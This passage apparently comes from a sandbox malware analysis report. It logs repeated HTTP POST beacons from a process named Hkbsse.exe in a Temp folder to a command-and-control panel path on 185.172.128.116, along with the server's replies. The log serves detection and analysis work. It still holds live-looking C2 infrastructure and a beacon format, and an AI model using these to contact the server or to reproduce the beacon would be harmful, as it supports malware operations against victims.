                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        35192.168.2.559007185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:32.995697021 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:33.666182041 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:33 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:33.667146921 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:33.867038012 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:33 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        36192.168.2.559008185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:33.988967896 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:34.649667025 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:34 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:34.650388956 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:34.848117113 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:34 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        37192.168.2.559009185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:34.969933033 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:35.604096889 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:35 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:35.605546951 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:35.797148943 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:35 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        38192.168.2.559010185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:35.925884962 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:36.584498882 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:36 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:36.585618019 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:36.783905029 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:36 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        39192.168.2.559011185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:36.894092083 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:37.538760900 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:37 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:37.539861917 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:37.736588955 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:37 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        40192.168.2.559012185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:37.847704887 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:38.490632057 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:38 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:38.491586924 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:38.683643103 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:38 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        41192.168.2.559013185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:38.798409939 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:39.640836000 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:39 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:39.641782999 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:39.865509987 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:39 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:39.865792036 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:39 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:40.053833961 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:39 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        42192.168.2.559014185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:40.173041105 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:40.849814892 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:40 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:40.850939989 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:41.047023058 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:40 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        43192.168.2.559015185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:41.157285929 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:41.818476915 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:41 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:41.819479942 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
